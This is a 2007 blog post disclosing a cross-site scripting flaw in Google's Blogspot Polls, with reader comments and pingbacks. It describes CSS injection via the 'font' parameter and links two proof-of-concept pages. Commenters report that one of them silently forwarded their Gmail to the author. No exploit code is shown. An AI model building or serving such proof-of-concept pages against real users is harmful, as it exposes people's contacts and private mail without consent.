Yesterday, I found a new Google.com XSS vulnerability that can be abused to steal information from Gmail accounts, I've done responsible disclosure of at least 3 vulns to Google, but since I haven't got enough 'motivation', I'll go full disclosure now.
The vulnerability exists in Blogspot polls feature, I had already disclosed a vulnerability on this system. The 'font' parameter was not being sanitized before being used inside an STYLE tag, so you could inject IE's expression() and Mozilla's -moz-binding. They fixed it, however they didn't check enough the rest of the code, the new XSS is:
Since its Sunday and there is nothing else to do, I've created 2 more pocs, one of them, shows a your contacts, the second one will make Gmail forward all new received emails to another email account, no user interaction required, well you just need to open a website while still logged to Gmail.
POC1: http://beford.org/stuff/contacts.htm
POC2: http://beford.org/stuff/gmail.htm
I have tested them under IE, Konqueror, Opera and Firefox, it should work on all of them. If you want to be protected against this kind of attacks, I'd highly recommend Firefox + NoScript.
Update: Google fixed this issue, I'd like to ask the people that looked at the second poc to disable forwarding if you have not done so, I'm still getting ton of email. This screenshot shows how to disable forwarding.
Ouch!
I love how you make your AJAX life easier by importing the Prototype library: dandy hacker
Comment by Giorgio Maone — September 24, 2007 @ 10:56 am
[...] because of the huge user base involved: beford decided to launch his new blog disclosing a Google Polls XSS which, thanks to the clever “widget reuse” feature that allows Google services to [...]
Pingback by hackademix.net » GoogHOle (XSS pwning GMail, Picasa and almost 200K customers) — September 24, 2007 @ 12:40 pm
[...] to Fernando from beford.org, this is 4th vulnerability he found so far on Google services and because it affects huge number of [...]
Pingback by Gmail XSS exploit - Google XSS - Gmail vulnerability — September 24, 2007 @ 7:36 pm
[...] A Google Polls XSS which, thanks to the (too) smart “widget reuse” allowing Google services to integrate the same [...]
Pingback by DigitMemo.com » Multi Google Security Holes Revealed — September 24, 2007 @ 9:15 pm
[...] hay algo aún peor. Beford.org detalla otra vulnerabilidad XSS en Google que permite robar información de cuentas de Gmail. El fallo reside primariamente en [...]
Pingback by [SSD] Security & Development Blog » Semana negra para Google — September 24, 2007 @ 10:16 pm
[...] [via bedford] Link to This Post: [...]
Pingback by Google Vulnerabilities Reveal Your Gmail Contacts & Messages — September 25, 2007 @ 2:52 am
Fails with Firefox/NoScript …just FYI
Comment by pog — September 25, 2007 @ 9:33 am
[...] http://cdn.eyewonder.com/100125/752669/917748/dot.gif Multiple pieces of proof-of-concept code posted online graphically demonstrated the potential for attacks that target the weakness. One stole all contacts [...]
Pingback by Unholy trinity of flaws put Google users at risk - Computer Forums — September 25, 2007 @ 12:02 pm
[...] third issue has been disclosed at Beford.org to show how a cross-site scripting bug in Google’s Blogspot Polls could allow the hijacking [...]
Pingback by Ryan Naraine’s Zero Day mobile edition — September 25, 2007 @ 8:06 pm
[...] third issue has been disclosed at Beford.org to show how a cross-site scripting bug in Google’s Blogspot Polls could allow the hijacking of [...]
Pingback by Hackers expose holes in GMail, Blogspot, Search Appliance | xMoDx — September 25, 2007 @ 11:24 pm
[...] third issue has been disclosed at Beford.org to show how a cross-site scripting bug in Google’s Blogspot Polls could allow the hijacking of [...]
Pingback by DigitMemo.com » Hackers expose holes in GMail, Blogspot, Search Appliance — September 26, 2007 @ 12:10 am
[...] http://blog.beford.org/?p=3 http://sla.ckers.org/forum/read.php?3,16177,16262 Producto afectado: Blogspot y el buscador de [...]
Pingback by ·¨-=[WHK]=-¨· » Archive » Multiples vulnerabilidades en los productos de Google — September 26, 2007 @ 3:11 am
[...] olika tekniker för att stjäla Gmail-användarnas e-post har upptäckts. Läs mer om teknikerna här och [...]
Pingback by Så kan Gmail-användare skydda sin e-post från att bli stulen « Webbsnack — September 26, 2007 @ 11:58 am
[...] a rischio si rivela essere Gmail, il quale presenta una duplice vulnerabilità. La prima, illustrata sul blog di Fernando Beford, risiede nella cosiddetta ‘polls application’, una parte di [...]
Pingback by Nuove vulnerabilità per i servizi Google « APNIBI blog — September 26, 2007 @ 3:02 pm
sad that the issue is already fixed, dont see anything now
Comment by John — September 26, 2007 @ 4:03 pm
[...] lek in Google Polls maakt het mogelijk om andere Google diensten aan te vallen, zoals Search, Blogspot, [...]
Pingback by NieuwsEnzo.info » Welkom » Google Analytics, Picasa, Polls en Search Appliance zijn lek ! — September 26, 2007 @ 5:05 pm
[...] third issue has been disclosed at Beford.org to show how a cross-site scripting bug in Google’s Blogspot Polls could allow the hijacking of [...]
Pingback by eBusiness Industry News » Blog Archive » Bullseye on Google: Hackers expose holes in GMail, Blogspot, Search Appliance — September 26, 2007 @ 6:59 pm
[...] http://blog.beford.org/?p=3 http://blogs.zdnet.com/security/?p=539 [...]
Pingback by me@myself » Google funciona como reloj… — September 26, 2007 @ 9:46 pm
[...] de ellas, las cuales han sido recopiladas en este post de Kriptopolis. Quizá la más grave sea esta, puesto que permitía hacerse con el control de una cuenta de Gmail, y a partir de ahí con la [...]
Pingback by [SSD] Security & Development Blog » Colección de vulnerabilidades XSS en aplicaciones de Google — September 27, 2007 @ 2:41 am
[...] Drie lekken Eerder deze week werden al drie andere ernstige lekken in Google-diensten ontdekt. E?n fout maakte het mogelijk om e-mail en adresboek van GMail-gebruikers te stelen. Google zou dat lek [...]
Pingback by Ernstig lek in maildienst Google - i3D.net Game Forums — September 27, 2007 @ 4:24 am
[...] Gmail que permite el reenvío de emails que cumplan determinadas condiciones al atacante hasta uno relacionado con el sistema de encuestas de Blogspot, el cual puede ser usado para robar desde los contactos hasta los mismos emails, se tratan de [...]
Pingback by Geekotic · Loa agujeros de Google — September 27, 2007 @ 4:05 pm
[...] — given the huge number of users involved — is one discovered by researcher beford in a Google Polls XSS that allows Google services to integrate the same functionality across multiple services. [...]
Pingback by A rough week for Google security — Security Bytes — September 28, 2007 @ 12:12 am
Hi -
I think perhaps both links do the forwarding? I believe that I only clicked on the contacts link.
But it looks like this sets up forwarding on the gmail account in question to your mailbox, since my gmail account has been forwarding to you for a couple of days.
Your account is now full, and bouncing, so I suspect I’m not the only one that clicked on it, and was left with all their email forwarding to you.
Sorry about that, and, of course, please delete.
Comment by Tom — September 28, 2007 @ 8:16 pm
[...] luki (opublikowanej przez beford.org) mo?liwe by?o dzi?ki spreparowanej stronie otwieranej podczas gdy w innej karcie otwarta by?a [...]
Pingback by Luka w Gmail at grezlikowski.pl — September 28, 2007 @ 8:34 pm
I visited the poc page and saw nothing, but now I’m getting bounces from fernando@beford.org.
I guess I misunderstood the nature of XSS attacks– doesn’t restarting the browser fix the issue?
Comment by jeff — September 28, 2007 @ 10:16 pm
Ah, I’m dumb, I had no idea POC turned on gmail forwarding. Sorry for mailbombing you Fernando, I did not fully understand your POC.. and I get a LOT of freakin email via various Linux/FreeBSD mailing lists.
Comment by jeff — September 28, 2007 @ 10:18 pm
I guess that I should have added a bigger/better explained warning, I wasn’t expecting the exposure I got such as being on slasdot/cnet/theregister/etc. I’ve just disabled that email account.
All the code is up there, only the second poc enabled forwarding http://beford.org/stuff/
Comment by beford — September 29, 2007 @ 3:19 am
Great job, sir!
I actually played with your POC and then forgot about it… I guess I should have payed more attention!
It’s amazing to know just how many of us will click a link even when we know its bad… and it’s scary just how easy it is exploit something that most of us use.
Excellent POC, excellent job!
P.S. please disregard all the securityfocus spam and porn that I sent you… =)
Comment by bladerunner — September 29, 2007 @ 9:50 pm
[...] turns out to be timely. Two exploits against gmail have been reported in the past week (here and here), and there’s an interesting account of what you can do if someone compromises your [...]
Pingback by The Blog That Goes Ping » Blog Archive » De-Gmailing. — October 1, 2007 @ 3:41 am
XSS ??????????? ? Google Polls
?? ???????? ????? ???? ???????? ???? XSS ??????????? ?? ????? ?????. ?? ????????? Beford ? ?????? ?????? Google Vulnerability, ??? ?????? ??????????? ? G…
Trackback by Websecurity - ??? ??????? — October 1, 2007 @ 9:42 pm
[...] ???? ??? ???? ?????? ?? ???? ???? ??? ?? ??? ?? ?? ????? ????? ??? [...]
Pingback by ???? ? ??????? ?????? ! « ???????? :: Punisher :: — October 7, 2007 @ 8:17 pm
[...] mi faccio aiutare dal direttore tecnico di Ymir e scopriamo che:“Il ricercatore colombiano Fernando Muñoz ha scoperta un nuova vulnerabilità XSS in Google.com che può essere sfruttata per rubare [...]
Pingback by Anche i ricchi sbagliano « Ket! che ci fai in Congo? — November 21, 2007 @ 9:49 pm
nada mal para un viado como tu ;-P
saludos
Comment by lithyum — November 22, 2007 @ 9:36 pm
Lithyum: Gracias bizexual xD pero este es el bug viejo, era el otro el que tenias que ver.
Comment by beford — November 23, 2007 @ 1:04 am
[...] appears that the GMail security issue is fixed, but that won’t remove any previously installed Filters from your GMail [...]
Pingback by WARNING: Google’s GMail security failure leaves my business sabotaged :: David Airey :: Graphic and Logo Designer — December 24, 2007 @ 11:00 am
Disable filtering? Wouldn’t simply reviewing your filters work to remove any evil ones? Or am I missing something?
Comment by Michael — December 26, 2007 @ 8:20 pm
Michael: There seems to be some confusion regarding this vulnerability/poc with pdp’s find. This only allowed to use Gmail’s built in option to forward incoming email, pdp’s find used a CSRF on Gmail to inject evil filters. According to what I read, David Airey’s account was attacked by using CSRF.
To reverse my attack, you have to disable Forwarding, and for pdp’s you have to remove evil filters from your filters list.
Comment by Fernando Muñoz — December 27, 2007 @ 8:16 pm
[...] just finished reading about the Google Vulnerability which was present a few weeks go (but subsequently fixed). Basically, an unscrupulous website could [...]
Pingback by Check your Gmail filters! » thepinkc — December 28, 2007 @ 8:03 am
Okay so two different exploits. I am still confused and now concerned as well. Your post is rather unclear about what the second exploit does, how to undo it, or if Google has or hasn’t fixed the issue. Some of us would like to be able to use forwarding again on our accounts!
Comment by Michael Bierman — December 28, 2007 @ 2:46 pm
I think I have resolved my confusion. It isn’t that a user needs to disable forwarding, it is they need to remove the address your attack places in the pop/Forwarding page (unlike the previous attack which worked via filters). Correct?
Many thanks.
Michael
Comment by Michael — December 28, 2007 @ 7:06 pm
An update on the designer who lost his domain (and got it back again)
http://www.davidairey.co.uk/david-airey-domain-restored.html
Michael
Comment by Michael — December 28, 2007 @ 9:03 pm
That’s right Michael.
This is the post where pdp posted about the CSRF http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/
Pdp just informed about the vuln on his blog, but didn’t release any details until Google fixed the issue.
Comment by Fernando Muñoz — December 31, 2007 @ 5:07 pm
[...] appears that the GMail security issue is fixed, but that won’t remove any previously installed Filters from your GMail [...]
Pingback by David Airey :: Graphic and Logo Designer » WARNING: Google’s GMail security failure leaves my business sabotaged — January 17, 2008 @ 10:41 am
[...] so as not to reveal the technique (or leave incriminating evidence). Turns out it was a well documented and discussed (at least in webapp security circles) vulnerability in GMail where via CSRF an [...]
Pingback by Real-word CSRF hack | Mike Andrews — January 19, 2008 @ 6:45 am
My girlfriend just told me that she was seeing some “weird messages” on her account, and on inspection it looks like she fell foul of an exploit akin to your second POC quite some time ago – she’s only been getting messages now because the mailserver it’s trying to forward to has been failing.
I didn’t hear about this exploit when it was first found, and I’m reasonably technically-focused; my girlfriend didn’t stand a chance. I’m astonished that Google didn’t send out any kind of alert to their users when they patched the hole, because anyone who’d been exploited would still have the forwarding rule in place even after the patch.
Comment by Richard — March 25, 2008 @ 12:23 am
[...] The hacker exploited a GMail backdoor to insert a filter that forwards administrative emails to a different email address and subsequently deletes the original email. The cross-scripting vulnerability has since been fixed. [...]
Pingback by Gmail Vulnerability caused Domain loss | Domain Name News | Domain News | Expired Domains — April 23, 2008 @ 10:23 am